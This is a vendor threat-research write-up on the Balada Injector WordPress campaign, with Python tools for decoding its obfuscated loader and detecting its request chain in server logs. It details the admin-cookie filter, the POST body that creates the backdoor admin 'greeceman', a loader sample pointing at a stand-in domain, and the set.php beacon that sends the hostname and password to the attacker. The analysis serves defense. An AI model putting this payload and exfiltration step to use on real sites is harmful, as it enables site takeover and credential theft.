Balada Injector 2.0: Evading Detection & Gaining Persistence

GeoEdge’s Security team has uncovered a novel technique used by Balada Injector. Balada Injector is known for taking control of vulnerable websites and implanting malicious scripts that auto-redirect unsuspecting visitors to scam or adult pages. To evade detection, the attacker has implemented a filtering mechanism that suppresses the automatic redirection when the website is accessed by an administrator.

Differing from the previous iteration of the attack, GeoEdge’s Security team has identified a novel technique employed by Balada Injector. Moriya Pedael, security researcher at GeoEdge, revealed that this technique achieves a full takeover of the website’s functionality and maintains persistence on vulnerable websites by creating a new admin user.

Targeting Users

In the past, the attacker only auto-redirected innocent visitors after confirming the absence of two cookies, ‘wp-settings’ and ‘wp-settings-time’.

These cookies are set by WordPress itself to store admin-interface preferences. If they are present in the client’s browser, the client is most likely an admin.

Now the attacker identifies admin clients by an additional cookie on top of the two above, and also by inspecting the browser’s current location (URL).

Conditions Balada Injector uses to detect an admin session:

  1. ‘wp-settings’ cookie is in the document (legacy filter).
  2. ‘wp-settings-time’ cookie is in the document (legacy filter).
  3. ‘logged_in’ cookie is in the document.
  4. ‘wp-admin’ is in window.location.href.
  5. ‘wp-login.php’ is in window.location.href.

Additionally, Balada Injector now redirects users based on their OS type, ensuring the scam page is more relevant to the target. Below are figures to demonstrate it.

Figure 1: Redirect attack on iOS devices (iPhone 14).
Figure 2: Redirect attack on other devices.

Persistence Control on Vulnerable websites

In the past, the attacker’s ability to maintain control over a website depended on exploiting existing vulnerabilities in the site: the more severe the vulnerability, the more control they could obtain, and sometimes a chain of several vulnerabilities was needed before control was possible at all.
This process stayed hidden from everyone except the attacker and the target website’s administrator, who could detect it by examining website logs or scanning files for infections.

Now, Balada Injector has adopted a new technique to gain persistence control. The injected script within the compromised website, deployed on the client side, exclusively targets administrators of the infected websites.

When an admin is connected, the script leverages the admin’s permissions to create a new admin account, ensuring ongoing access and the ability to reinfect the website even after it has been patched. To exclusively target administrators, the attacker employs the five detection mechanisms described earlier.

Static Analysis

As in the common Balada Injector attack pattern, the malicious script is obfuscated using ‘eval’ and ‘String.fromCharCode’, which makes it hard for humans or automated tools to read. These techniques are meant to evade lexical (signature-based) detection.

As the screenshot below shows, static detection cannot decide whether the script that ‘eval’ builds at runtime is malicious until all the ASCII character codes have been joined back into readable script, or unless that script is already known to be malicious.

Figure 3: Screenshot of the script embedding in the infected page.
Figure 4: Decoded script
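To show what joining the character codes back into a script looks like in practice, here is an added Python helper (not code from the GeoEdge write-up) that peels nested eval(String.fromCharCode(...)) layers, rewrites inline String.fromCharCode calls as plain string literals, and pulls out any script URLs the decoded layer references. The obfuscated input is constructed inside the block from a placeholder loader; the domain malicious-domain.invalid is a stand-in, not the real one.

```python
import re

# String.fromCharCode(...) whose arguments are all numeric literals (decimal or hex).
FROMCHARCODE_RE = re.compile(
    r"String\.fromCharCode\(\s*((?:0[xX][0-9a-fA-F]+|\d+)(?:\s*,\s*(?:0[xX][0-9a-fA-F]+|\d+))*)\s*\)"
)
# A whole script layer that is nothing but eval(String.fromCharCode(...)).
EVAL_WRAPPER_RE = re.compile(
    r"eval\(\s*String\.fromCharCode\(\s*([0-9a-fA-FxX,\s]*?)\s*\)\s*\)\s*;?", re.S
)
URL_RE = re.compile(r"https?://[^\s'\"<>()]+")


def decode_charcodes(arglist: str) -> str:
    """Turn '104,105' (or '0x68,0x69') into the string those code points spell."""
    out = []
    for tok in re.split(r"\s*,\s*", arglist.strip()):
        if not tok:
            continue
        code = int(tok, 16) if tok.lower().startswith("0x") else int(tok)
        out.append(chr(code))
    return "".join(out)


def unwrap_fromcharcode(src: str) -> str:
    """Rewrite inline String.fromCharCode(...) calls as JS string literals,
    so the surrounding code stays readable and syntactically valid."""
    def as_literal(m):
        text = decode_charcodes(m.group(1))
        escaped = text.replace("\\", "\\\\").replace('"', '\\"').replace("\n", "\\n")
        return '"' + escaped + '"'
    return FROMCHARCODE_RE.sub(as_literal, src)


def peel_eval_layers(src: str, max_depth: int = 10) -> list:
    """Strip successive eval(String.fromCharCode(...)) wrappers.
    Returns every decoded layer, innermost last; stops at the first layer
    that is not a pure eval wrapper."""
    layers = []
    cur = src.strip()
    for _ in range(max_depth):
        m = EVAL_WRAPPER_RE.fullmatch(cur)
        if not m:
            break
        cur = decode_charcodes(m.group(1)).strip()
        layers.append(cur)
    return layers


def extract_urls(script: str) -> list:
    """List http(s) URLs in a (partially) decoded script, e.g. the loader's src."""
    return URL_RE.findall(unwrap_fromcharcode(script))


# --- constructed sample: two eval layers around a loader that pulls /src/page.js ---
def to_fromcharcode(s: str) -> str:
    return "String.fromCharCode(" + ",".join(str(ord(c)) for c in s) + ")"


# Placeholder loader; the .invalid domain is a stand-in, not the real campaign domain.
INNER_LOADER = ('var s=document.createElement("script");'
                's.src="http://malicious-domain.invalid/src/page.js";'
                'document.head.appendChild(s);')
OBFUSCATED_SAMPLE = "eval(" + to_fromcharcode("eval(" + to_fromcharcode(INNER_LOADER) + ")") + ")"

if __name__ == "__main__":
    layers = peel_eval_layers(OBFUSCATED_SAMPLE)
    for depth, layer in enumerate(layers, 1):
        print(f"layer {depth}: {layer[:60]}...")
    print("script URLs:", extract_urls(layers[-1]))
```

The peeling loop only accepts a layer that is a pure eval wrapper; real samples often mix in string concatenation or array joins, so a layer that fails to match is returned as-is for manual inspection rather than guessed at.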

The embedded script creates a second script element whose source is the malicious domain itself. The structure of this script’s path is:

hxxp://{malicious_domain}/src/page.js

This script is also obfuscated, using the encoding technique described above.

Figure 5: Part of the script ‘page.js’ from the malicious domain.

The flow of the ‘page.js’ script:

The filtering mechanism is executed first, and if the connected client is identified as an admin (possessing the ‘wpsapiadmin’ cookie), the ‘create-user’ dynamic script is initiated.

Figure 6: Screenshot of initiating the ‘create-user’ attack on admins.
Figure 7: Dynamic ‘create-user’ script.

The Malicious ‘Create-User’ Script:

Once the client is identified as an admin, the script first checks whether the website has already been compromised by inspecting its users: it requests ‘/wp-admin/users.php’ and looks for the foreign admin user that a successful run would create. The malicious admin created in this attack is ‘greeceman’.

If that user does not exist, the script makes another request, this time to ‘/wp-admin/user-new.php’, to obtain the ‘wp-nonce’ required to create a new user.

A WordPress nonce is a unique security token that protects URLs and forms; WordPress uses it to verify that a request is legitimate, preventing unauthorized actions and inputs.

After obtaining the nonce, the script sends a POST request to ‘/wp-admin/user-new.php’ with the Content-Type header ‘application/x-www-form-urlencoded’ and the following body values:

    action=createuser
    _wpnonce_create-user={the_created_nonce}
    user_login=greeceman
    email=greeceman@mail.com
    pass1={random_created_password}@
    pass2={random_created_password}@
    role=administrator

The final request is a GET request to the attacker’s domain carrying the compromised site’s hostname (window.location.hostname) and the newly created password as query parameters, which sends this information back to the attacker.

A query parameter is a piece of information appended to the end of a URL, typically following a question mark.

The final request is:

hxxps://{maliciousDomain}/set.php?z={locationHostname}-p-{userPassword}@

At the time of writing, the domain found delivering this script is decentralappps[.]com
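From the defender’s side, the three server-side requests in this sequence (GET users.php, then GET user-new.php, then POST user-new.php) arrive within seconds of each other because a script, not a person, is sending them. The following Python detector, an added example rather than GeoEdge’s tooling, parses combined-format web server access log lines, flags any client that completes that chain inside a short window, and also recognises the set.php exfiltration URL pattern should it appear in proxy logs. The log lines, IP addresses and the 10-second window are constructed assumptions.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime

# Apache/nginx "combined" format: ip ident user [ts] "METHOD url proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
# Exfil beacon shape from the write-up: /set.php?z={hostname}-p-{password}@
EXFIL_RE = re.compile(r"/set\.php\?z=[^&\s]+-p-[^&\s]+@")

# The request chain the create-user script issues against the victim site.
CHAIN = [
    ("GET", "/wp-admin/users.php"),
    ("GET", "/wp-admin/user-new.php"),
    ("POST", "/wp-admin/user-new.php"),
]


@dataclass
class Event:
    ip: str
    ts: datetime
    method: str
    path: str
    status: int


def parse_line(line: str):
    """Parse one combined-format log line into an Event (query string dropped)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    path = m.group("url").split("?", 1)[0]
    return Event(m.group("ip"), ts, m.group("method").upper(), path, int(m.group("status")))


def detect_create_user_chains(lines, window_seconds: int = 10):
    """Return (ip, chain_start, chain_end) for every client that completes the
    users.php -> user-new.php -> POST user-new.php chain within the window."""
    by_ip = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev:
            by_ip[ev.ip].append(ev)

    hits = []
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e.ts)
        for i, start in enumerate(events):
            if (start.method, start.path) != CHAIN[0]:
                continue
            stage = 1
            for ev in events[i + 1:]:
                if (ev.ts - start.ts).total_seconds() > window_seconds:
                    break  # too slow to be the scripted chain
                if (ev.method, ev.path) == CHAIN[stage]:
                    stage += 1
                    if stage == len(CHAIN):
                        hits.append((ip, start.ts, ev.ts))
                        break
    return hits


def is_exfil_url(url: str) -> bool:
    """True if a URL matches the hostname/password beacon shape."""
    return EXFIL_RE.search(url) is not None


# Constructed sample log: one scripted chain (3 s), one human admin (minutes), noise.
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Oct/2023:13:55:36 +0000] "GET /wp-admin/users.php HTTP/1.1" 200 5123 "https://victim.example/wp-admin/" "Mozilla/5.0"',
    '203.0.113.10 - - [10/Oct/2023:13:55:37 +0000] "GET /wp-admin/user-new.php HTTP/1.1" 200 4410 "https://victim.example/wp-admin/" "Mozilla/5.0"',
    '203.0.113.10 - - [10/Oct/2023:13:55:39 +0000] "POST /wp-admin/user-new.php HTTP/1.1" 302 0 "https://victim.example/wp-admin/" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:14:00:00 +0000] "GET /wp-admin/users.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:14:02:10 +0000] "GET /wp-admin/user-new.php HTTP/1.1" 200 4410 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:14:03:30 +0000] "POST /wp-admin/user-new.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [10/Oct/2023:14:05:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2201 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, t0, t1 in detect_create_user_chains(SAMPLE_LOG):
        print(f"suspicious create-user chain from {ip}: {t0.time()} -> {t1.time()}")
```

A fast human administrator can also complete the chain inside the window, so treat a hit as a lead rather than proof: confirm it by auditing the WordPress user table for administrator accounts you did not create (the write-up’s indicator is ‘greeceman’) and comparing their registration time with the flagged POST.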

Attribution of the persistence code to Balada Injector

There are a few characteristics in our analysis that clearly attribute this campaign to Balada Injector:

  1. The domain delivering the malicious code also delivers the final stage of Balada Injector’s common redirect attack. Figures 1 and 2 are examples of the redirect pages this domain leads to.
  2. The script is obfuscated with the ‘eval’ + ‘String.fromCharCode’ functions.
  3. The same admin filtering/targeting mechanism is used.

GeoEdge is in contact with compromised sites, and our research into this attack is ongoing.